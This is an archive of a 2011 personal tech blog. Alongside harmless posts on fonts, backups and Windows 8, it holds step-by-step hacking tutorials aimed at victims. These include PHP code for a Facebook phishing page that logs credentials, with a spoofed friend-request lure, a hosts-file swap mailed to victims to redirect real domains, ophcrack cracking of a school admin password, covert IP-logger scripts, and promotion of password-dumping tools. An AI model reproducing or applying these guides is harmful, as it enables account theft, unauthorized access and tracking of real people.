Friday, September 30, 2011

Create Your Own Fonts



This video shows you how you can create your own customized font. To do this, we will be using the websitehttp://fontstruct.fontshop.com
Posted by paventhan at 4:44 AM 0 comments

Make Free Calls With Your Smartphone

Posted by paventhan at 4:42 AM 0 comments

Backup Your Entire Computer For Free



Protect yourself from computer crashes by backing up your computer using this free software. GFI Backup utility: http://www.gfi.com Belarc Advisor (License Keys) http://www.belarc.com/free_download.html
Posted by paventhan at 4:40 AM 0 comments

How To Get Google Chrome OS

This video shows you two different ways for installing Chrome OS by Google without harming your current computer settings. The links below are used in the video:

Win32 Image Writer – https://launchpad.net/win32-image-writer/+download

ChromiumOS Cherry – http://www.tinkernut.com/demos/215_chrome/ChromeOS-Cherry.tar.gz

VirtualBox – http://www.virtulabox.org
Posted by paventhan at 4:38 AM 0 comments

Make Windows 7 Look Like Windows 8




This video will show you how you can get the best parts of Windows 8 on your current Windows 7 PC.
Posted by paventhan at 4:37 AM 0 comments

How To Download and Install Windows 8

Preview the next version of Windows by downloading it or free and installing it on Virtualbox. This will let you install it and use it without screwing up the rest of your computer.

Download:
Windows 8 – http://msdn.microsoft.com/en-us/windows/apps/br229516
Virtualbox – http://www.virtualbox.org
MetroController – http://winaero.com/download.php?view.15
Windows 8 Start Menu Toggle – http://solo-dev.deviantart.com/art/Windows-8-Start-Menu-Toggle-258422929
Posted by paventhan at 4:33 AM 0 comments

Monday, July 25, 2011

Mail Password Decryptor


IncrediMail Password Decryptor is the FREE software to instantly recover mail account passwords from IncrediMail - a popular email client. IncrediMail stores all the configured mail account passwords in registry in an encrypted format. This software automatically discovers all such stored passwords and decrypts them.

 For each recovered mail account, it will show email address, username, password, account type (POP3/IMAP) and server information. You can recover the passwords using GUI interface as well as Command-line version - both integrated in single tool. This makes it useful tool for Penetration Testers and Forensic investigators.

IncrediMail Password Decryptor works on most of the Windows platforms starting from Windows XP to latest operating system, Windows 7.

Here are the main feature highlights
  1. Instantly decrypt and recover stored mail account passwords by IncrediMail
  2. Recover password of any length and complexity.
  3. Presents both GUI and Command-line Interface.
  4. Useful for Penetration Testers & Forensic investigators.
  5. Save the recovered password list to HTML file for transferring to other system or for future use.
  6. Support for local Installation and uninstallation of the software.


IncrediMailPasswordDecryptor is easy to use with its simple GUI interface.

Here are the brief usage details

  1. Launch IncrediMailPasswordDecryptor on your system after the installation.
  2. Next click on 'Start Recovery' button. Instantly all the stored web server login passwords will be cracked & displayed as shown in screenshot 1 below.
  3. By default passwords are not displayed being sensitive data. To view the actual password click on"Show Password" button.
  4. Finally you can save all recovered password list to HTML file by clicking on 'Export to HTML' 
Screenshot 1: IncrediMailPasswordDecryptor is showing the recovered mail account passwords fromIncrediMail



Screenshot 2: Command line usage of IncrediMailPasswordDecryptor showing various examples.
 
IncrediMailPasswordDecryptor
 
 
Screenshot 3: Exported list of of recovered passwords by IncrediMailPasswordDecryptor in HTML format.
 
Exported IM Accounts to HTML


Posted by paventhan at 5:25 AM 0 comments

Saturday, July 23, 2011

hacking yahoo mail - Password finder



YahooPasswordDecryptor is the FREE software to instantly recover  Yahoo Loginpasswords stored by popular web browsers and instant messengers. Most of these applications store the login passwords so that user don't have to remember and enter the password every time. Each of these use their own local storage format and proprietary encryption mechanism to store the login passwords. YahooPasswordDecryptor automatically crawls through each of these applications and instantly recovers all of the stored Yahoo Login  passwords.
YahooPasswordDecryptor presents both GUI interface as well as command line version, the later is more helpful for Penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for Forensic officials who can get hold of any stored Yahoo Login passwords and then use that  information to extend their investigation.

YahooPasswordDecryptor is fully Portable software which can be directly run anywhere without installing locally. It also comes with Installer for those who wants to install it locally and use it on regular basis. It works on wide range of platforms starting from Windows XP to latest operating system Windows 7.


YahooPasswordDecryptor supports recovery of Yahoo Login passwords from these applications 
  • Firefox
  • Internet Explorer
  • Google Chrome
  • Opera
  • Apple Safari
  • Flock Browser
  • PaltalkScene IM
  • Pidgin (Formerly Gaim)Messenger
  • Miranda Messenger
Note that it is not possible to decrypt the password storedy by Yahoo Messenger as it does not store the password directly. You can find more details here. 
 
Here are the highlights of top features of YahooPasswordDecryptor which makes it stand apart from other similar tools including commercial ones.
  •  Instantly decrypt and recover stored encrypted passwords from popular web browsers & messengers.

  •  Comes with both GUI interface as well as Command-line version.

  •  Recover password of any length and complexity.

  •  Automatically discovers all supported Applications and recovers all the stored passwords.

  •  Sort feature to arrange the recovered passwords in various order to make it easier to search through 100's of entries.

  •  Save the recovered password list to HTML file for transferring to other system or for future use.

  •  Easier and faster to use with its enhanced user friendly GUI interface.

  •  Support for local Installation and uninstallation of the software.

  •  Completely Portable Software which also comes with optional Installer for assisting you in local Installation & Uninstallation.


Posted by paventhan at 12:42 AM 0 comments

Password hacking tool (free)



AsteriskPasswordSpy is the FREE tool to instantly reveal the hidden password behind asterisks (*****). It's user friendly interface can help you to easily find the passwords from any Windows based application.You can simply drag the 'search icon' to any password box to find the real password hidden by those asterisks.



Most applications do not display real password in the login box for security reasons and instead they show the asterisks (****). But often there is need to know the actual password especially if you have forgotten password that you have entered while ago.

In such cases, AsteriskPasswordSpy will help you to easily find out the real password hidden behind asterisks.

AsteriskPasswordSpy comes with Installer for local installation & un-installation. It works on wide range of platforms starting from Windows XP to latest operating system Windows 7.



Features of AsteriskPasswordSpy

Here are some of the smart features of AsteriskPasswordSpy

Instantly reveal the hidden password behind asterisks.
Support most of the windows based applications
Nice user friendly GUI interface makes it easier & faster
Show password of any length & complexity
Sort feature to quickly arrange and search through discovered passwords.
Save the recovered password list to HTML file.
Support for local Installation and uninstallation of the software.


Installing AsteriskPasswordSpy

AsteriskPasswordSpy comes with Installer so that you can install it locally on your system for regular usage. It has intuitive setup wizard (as shown in the screenshot below) which guides you through series of steps in completion of installation. At any point of time you can use Uninstaller to remove the software from the system.





Using AsteriskPasswordSpy

AsteriskPasswordSpy is easy to use with its simple GUI interface.

Here are the brief usage details


Launch AsteriskPasswordSpy on your system
Now simply drag the 'search icon' to any password box to reveal the passwords.
When you place it over the password box, it will automatically highlight it and password is added to list as shown in the screenshot below.
Finally you can save all recovered password list to HTML file by clicking on 'Export' button.


Screenshots of AsteriskPasswordSpy

Here are the screenshots of AsteriskPasswordSpy

Screenshot 1:AsteriskPasswordSpy is showing all the recovered passwords from password boxes of various Windows applications.




Screenshot 2: AsteriskPasswordSpy is trying to get the password from Google Talk login box




Screenshot 3: Exported list of of recovered passwords by AsteriskPasswordSpy in HTML format.





Known Limitations


It does not work with non-windows based applications such as GTK, Flash, Adobe Air or applications not using standard edit box for the password.
Also it will not work with the application where password is not actually present. Some times applications do not put password in the password box to hide from these tools.
It does not work with HTML pages in the browsers such as IE, Firefox etc. Support for the same is planned for the future releases.


Release History


Version 1.0 : 2nd April 2011
First public release of AsteriskPasswordSpy

Click here to download
Posted by paventhan at 12:33 AM 0 comments

How to hack any Mail

phishing image
Hi friends ,  you may have known about how to create phishing web Page.  If you don't know about Phishing Web Page, you need to read this tutorials first:
        Different Types of Email account
        How To Create fake or phishing web page
Once you know the basics of Phishing web Page ,come to this post.

Ok friends, there's one drawback in our traditional Phishing web page method. You know what is it? You are right, the url of our phishing web page. It may look like the real one,but it is not.


For eg: we may create the Phishing web page with www.gmails.com but it's not at all same as www.gmail.com

Probably, the experienced internet users will notice the URL of web Page. So they won't fall in our Fishnet.

What we are going to do now?
Why should not we make the phishing web page's URL looks exactly same as the real Domain Name? You may ask "is it possible?". My answer is yes, you can. It sounds good na? go ahead.

How we are going to implement?
 We are going to send an email with an executable to victim.
If the victim double click the executable file, then you are done.
Now whenever the victim enter the real domain name (like www.facebook.com) ,he will be in our phishing web page.
Don't worry the domain name is original URL(like www.facebook.com)

Got surprised....!!!! You may ask how this is done,go ahead.

How it is done? 
   Executable file will change the Host file of Victim system. 
What is host file?
     The host file contains Domain Name and IP address associated with them.  Your host file will be in this path:
C:\Windows\System32\drivers\etc\

Whenever we enter the Domain name or URL (for eg: www.webaddress.com), a query will be send to the DNS (Domain Name server).  This DNS connect to the IP address which is associated with the Domain Name.   But before this to be done, the host file in our system will check for the IP address associated with the Domain Name.  Suppose we make an entry with Domain Name and IP address of our phishing web page(for  eg: www.webaddress.com wiht our ip 123.23.X.X),then there's no query will be send to the DNS.
It will automatically connect to the IP address associated with the Domain Name.  This will fruitful for us to mask the PHISHING web page's URL with Original Domain Name.


Now Let's divide into the Implementation:
  • If you are hosting some other hosting site, probably you won't get the unique IP address for your Phishing Web Page. You can have the IP Address of the hosting only. So if you try to use that IP address, the victim will not bring to your Phishing web page , they will bring to the hosting address. 

So what you can do overcome this problem? You need to set up your own Webserver in home. Using Webserver softwares you can set up your own Hosting service.

  Your computer should be turned on always. Because if you turned off the computer,then probably host will not be in online. Again it will be available when you turned on. So your computer turned on when victim visits your site.


How To set up Your own server?
  Download the  Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ).  My suggestion is WAMP.  Because it is my favorite one.  It is easy to use.

Downlad the wamp server from http://www.wampserver.com/

Install the WAMP server.  After installation completed, Go to this folder path:
C:\Wamp\WWW
And paste your phishing web page here.

Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)

you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.

Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.

Now you can see your Phishing web page in your Browser.

Modifying the Host file :
 Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop.  Right click on the host file and open with Notepad.

You can see the localhost entry there.
Below that type as :
your_ip     domain_name
For eg:
123.xx.xx.xx www.gmail.com
.
 Save the File.

Compress the Host File:

    Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
 
Right click on the Hosts file and select the Add to archieve option.  Now follow the steps which is shown in picture:







Now send the zipped file to victim.  If he extract the zip file, then the hosts file will be replaced.
You are done.  Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.


Some Disadvantages of this Hack:
  •    If your IP address is dynamically changed ,then it is hard to implement it
  •   If your victim is advanced user,he may notice the certificates of site which is shown by browser.
Don't worry it is not at all big problem.   Just try it ane enjoy it.
Posted by paventhan at 12:09 AM 0 comments

No Registration - send Anonymous Sms

Posted by paventhan at 12:07 AM 0 comments

How to use Proxifier to Hack the Airtel GPRS

In my last post i told you to use to hack the Airtel GPRS use Proxifier.  But i didn't tell you the procedure.  so here is the steps to set up the proxifier.

connect your mobile in pc suite mode.  Set access point as "airtelfun.com" and dial.  It will connect.  In order to make it work follow this steps.

Unzip the downloaded file (Before see this post).

You can find this files in that folder:
double click the Proxy Checker. Then this window will open

click the Proxy server Button.  small window open fill the form as shown in this picture:







Click ok then it will ask you "do you wan to specify ? yes or no".  click the "NO" button.





Then click the Test settings. and fill the form as shown in the following picture:

Finallly click the Start the Testing.  that's all now you can use the Airtel Live in the mobile:


Set the Airtel Live settings in mobile (address is :airtelfun.com)
Posted by paventhan at 12:06 AM 0 comments

Free SMS services from PC to Mobile phones

Posted by paventhan at 12:05 AM 0 comments

How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial



if you are college/school students, you may curious to hack the admin password in your college or school system. This post is going to help you to crack the any type of windows accounts passwords. Learn how to hack the windows admin password like a geek.

This is My Second Backtrack Linux Tutorial.
[see the screen shots of this tutorial ]

Refer this link also: How to hack the windows 7 or vista using the following method

Requirements:
  • BackTrack Linux 4 or 5. Download it from http://backtrack-linux.org
  • Two Pen drives [if you are going to test in your own system, one pen drive is enough]
  • Xp Free Fast RainBow table [tables_xp_free_fast.zip]. Download it from here:http://ophcrack.sourceforge.net/tables.php

Install the Backtrack Linux in one pen drive. Leave another pen drive as empty.

Step 1: Booting From Back Track 
Insert the Backtrack installed  pen drive in target computer[when turned off].  We are going to boot the operating system from pen drive, so insert when the system is turned off.
Press F10 [boot menu, differs for system]  before booting and select boot from Pen drive. 
Now it will boot the Backtrack.
Select "Graphical User Interface "
Now wait for a while ( it will execute some commands}
Now you can see the "root:"
type "startx" and hit enter.  It will bring you to the GUI view of Backtrack.

Step 2:Copy the SAM and System files
Click the  Start button(dragon symbol)
Select System Menu
Select Storage Media(if you see nothing, close the window open it again).

You can see the list of Hard disk and Your pen drive.
Open the windows installed Hard disk and Navigate to this path:
WINDOWS/system32/config/

There you can see two files named as "SAM" and "System". 

Copy the both SAM and system files.
[ Just proceed to next step without closing the window]

Step 3:Insert your Empty Pen Drive 
Now again go to System Menu->Storage Media
Open Your pen drive(Empty Pen drive) ,Create a new folder and paste the sam and system files inside that folder

[note: you may not paste into your backtrack installed pen drive. that's why i asked you to bring 2 pen drives.  If you testing in your system, then you can copy to any other hard drive.]

You can not directly copy the sam and system files from same operating system. That's why we are using Backtrack.

Step 4:Now go to your home.
Boot into windows.  Extract the "tables_xp_free_fast.zip" in any hard drive.
Copy the folder that contains sam and system files from your pen drive.
Paste in any hard drive.
---
Restart the windows.
Insert the Backtrack installed pen drive and boot from Pen drive.

Step 5: Mounting the Hard drive in Backtrack


Now  go to System Menu->Storage Media(if you see nothing, close the window open it again).
and open the hard drives that contains sam files and rainbow tables. Then close it.

Don't be confused. I asked you to open those hard drive for mounting purpose. In linux , it won't mount automatically until you open the drive

Step 6: Run OphCrack Tool in Backtrack
Open the ophcrack GUI(start->Backtrack->Privilege Escalation->Password Attack->offline Attacks-ophCrack GUI).

Ophcrack GUI application will run now.

Step 7: Loading the folder that contains sam and system files

Click the Load and select "Encrypted SAM" in ophcrack tool.
Now it will ask you to select directory that contains SAM folder.
 
[Select Computer in file selecting window.  click '/'  browse to /media/your_Hard_Disk]
 Select the directory(don't open the directory, just select it).

Now it will load and display the list of user accounts in the windows.

Step 8: Target the Admin Account
Here i am going to hack the one of the administrator account "secure" of my computer.
So remove all other accounts except the target admin account.[This is not necessary, but it will increase the cracking speed] by clicking delete button.

Step 9: Install the Rainbow Table
Now let us install the Rainbow table.
Click the Table button in ophcrack tool.
Now it will ask you to selec the table. 
we are going to crack windows password right?. So choose the first one. and click the install button.
[note: i have installed the rainbow table already.  So it showing green.]

Now browse to the Rain bow table directory. I mean to the "tables_xp_free_fast" folder.
[here also, don't open the foler, just choose it]

now click ok.


Step 10: Cracking Begins
Click the Crack button.
Wait for a while [ophcrack is the fastest cracking tool. so it won't take too much time]

Step 11: Password is cracked
Yes..!! we got the password.  Now go to your school/college and login with that password.
Enjoy.  Don't forget to share with your friends.  This is interesting one na..!
Actually i missed the fun.  I didn't know this hack when i study in college. if i know that time itself,
i may have fun with my college system. 

Using Backtrack Installed CD Or single Pen drive:
You will need only one pen drive, if you are going to hack the admin password in the target system itself. Don't forget to bring the rainbow table in your backtrack pen drive in this case.


you can use cd instead of Pen drive for backtrack installation.
If you use cd, you can not bring the SAM file to your home. You have to crack it in that computer itself
Posted by paventhan at 12:03 AM 0 comments

How to get Ip address using the Image in forums


Ip logging hacking
Hi friends, after long time i am going to post a hacking tutorial now.  This article will explain "how to  get ip address using the external image?"


Step 1:
First of all find a free web host service.
Here is the list of free web hosting service:
http://www.free-webhosts.com/
Get registered in any of free web hosting service.



Step 2:
make a new directory( i hope that you know how to create directory).
you can give any name to the directory.
Lets take as "Image".

your directory link is  http://www.yoursite.com/Image/

Step 3:
Create a file named as ".htaccess" (don't forget the dot operator).
Edit the .htaccess file and paste this code into the file:
RewriteEngine on
RewriteRule ^image.gif$ iplogger.php

Here you should consider two files, namely image.gif,iplogger.php(You can name it anything. as a n00b,lets try as it is).

image.gif:
Name your image file as "image.gif" and upload it to our directory.
I mean upload the image.gif file to Image directory.

iplogger.php:
a php file which has the ip logging code inside.

Step 4:
Open Notepad++ or Notepad
paste this code.
$log = 'logger.html';
$ip = $_SERVER['REMOTE_ADDR'];
$page = $_SERVER['REQUEST_URI'];
$refer = $_SERVER['HTTP_REFERER'];
$date_time = date("l j F Y  g:ia", time() - date("Z")) ;
$agent = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen("logger.html", "a");
fputs($fp, "
$date_time
IP: $ip
Page: $page
Refer: $refer
Useragent:
$agent


");
flock($fp, 3);
fclose($fp);
?>
save the file as "iplogger.php"

Create a empty html file ,name it as "logger.html".

Upload the two files to our directory,namely "Image" directory.

Step 5:
Go to a forum or wherever you would like

insert the image using the following BB code:
[img]http://www.yoursite.com/Image/image.gif[/img]

You can insert this in:

- Pm`s
- Posts & Threads
- Signatures
- Avatars
-And anything else that allows external linking of images.

If you would like to insert your image using HTML where is allowed then use this code:

Step 6:
Check your:
http://www.yoursite.com/Image/logger.html

For all your IP logs including where they came from.

if you want to know how it is working , you can refer this link:
http://www.workingwith.me.uk/articles/scripting/mod_rewrite
Posted by paventhan at 12:01 AM 0 comments

How to log IP of Victim using Web page? Ip Logger


So far, i have give some third party websites to track ip address of victim.  Today we are going to create our own website or webpage to track victim IP address.  I have written this PHP code for you.

Let me explain in two different methods
Method 1:
Log ip and redirect to some other interesting webpage(like "cute kittens pictures" page) or trusted page (like "facebook" page).

Method 2:
Log the ip and remains in same page( without redirection). I think "you won't select this method.

In this post , i will explain the method 1.



Requirements:
  • Any free hosting site and basic knowledge about file uploading to hosting.
  • url shortening sites account like co.cc,co.nr[optional]

Method 1-IP log php code: 

Step 1:
Create account in any free web hosting service.

Step 2:
Open notepad++ or notepad (if you have notepadd++, it will better to edit).
Paste the following code:
header("Location:index1.php");
$file="iplog.txt";
$f=fopen($file,'a');
fwrite($f,"-------------------------"."\n");
fwrite($f,"IP Address:".$_SERVER['REMOTE_ADDR']."\n");
fwrite($f,"User Agemt:".$_SERVER['HTTP_USER_AGENT']."\n");
fwrite($f,"Host Name:".php_uname('n')."\n");
fwrite($f,"Operating System:".php_uname('v')."(".php_uname('s').")"."\n");
fclose($f);
//provided by BreakTheSecurity.com
?>

and save it as index.php 

Code Explanation:
If you don't want to know how it is logging the IP, you can skip to the step 3.

header("Location:index1.php"); this will redirect to index1.php page.
 You can specify any other location instead.  For example, if you want to redirect to www.interestingwebsite.com ,then change the code as
header("Location: http://www.interestingwebsite.com");
or
header("Location: http://www.interestingwebsite.com/post.php");
  
$f=fopen($file,'a');  opens the file iplog.txt in append mode( add the contents at the end of file)and store the pointer in variable f.

fwrite($f,string) will write the string into the file(iplog.txt) for example, if the string is "hello", it will be stored inside iplog.txt file.

so fwrite($f,"-------------------------"."\n"); will insert ----------- inside the iplog.txt

fwrite($f,"IP Address:".$_SERVER['REMOTE_ADDR']."\n");
here $_SERVER['REMOTE_ADDR'] is build function ,returns IP address(if you run locally in your pc using wamp/xampp, it will return 127.0.0.1). So after ---------- lines, the "Ip address:127.0.0.1" will be append.

Now the iplog.txt file contains:
--------------------
IP Address: 127.0.0.1
$_SERVER['HTTP_USER_AGENT'] returns the current user agent used by victim.  It will contains information about the browser details(mozilla 3.6,ie),operating system(xp,linux).

php_uname('n') returns the Host name .  Now the iplog.txt contains

--------------------
IP Address: 127.0.0.1
User Agent: Mozilla (linux) (ubuntu 11.10) Mozilla3.6
HostName: xxxx.limestonenetwork.com

fclose($f); will close the opened file.

Step 3:
Open notepad and save the file as "iplog.txt"

Step 4:
again open the notepad and create your own php or html page. It should be some interesting contents(download any website templates,rename the index.html file to index1.html).
Example 1(html):



save the file as index1.html.
Example 2(php):


<?php echo "Cute kittens"; ?>


 
 save the file as index1.php


Step 5:
Now you have 3 files namely index.php,index1.php,iplog.txt.
Upload these files to your hosting.
File uploaded to hosting account
set iplog.txt permisson to read and write by global.

Set file permission for iplog.txt

Step 4:
Check whether it is working or not by visiting the your hosting sub domain account.
For example:
http://uraccount.hosting.com/index.php
if you enter the url, it will redirect from index.php to index1.php.
Now open the iplog.txt.  There you can see the logged information.

Step 5:
Send to your friend or victim with attractive mail content and title. At the end, ask him to visit the link to know more about the info.



Redirected to index1.php


Logged Details ,stored in iplog.txt file

Once he visit the link, his IP address is in your hands.
Posted by paventhan at 12:00 AM 0 comments

Friday, July 22, 2011

How to Hack Facebook Account Using Phising webPage


Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .


Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.



Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:

The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:

header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "next.php"

Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated*  
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  




Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 


Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.


Don't use this method for hacking others account. This article is for educational purpose only. Here is tips to prevent from Phishing Web page:
How to prevent from Phishing Web page?
Posted by paventhan at 11:59 PM 0 comments
Subscribe to: Posts (Atom)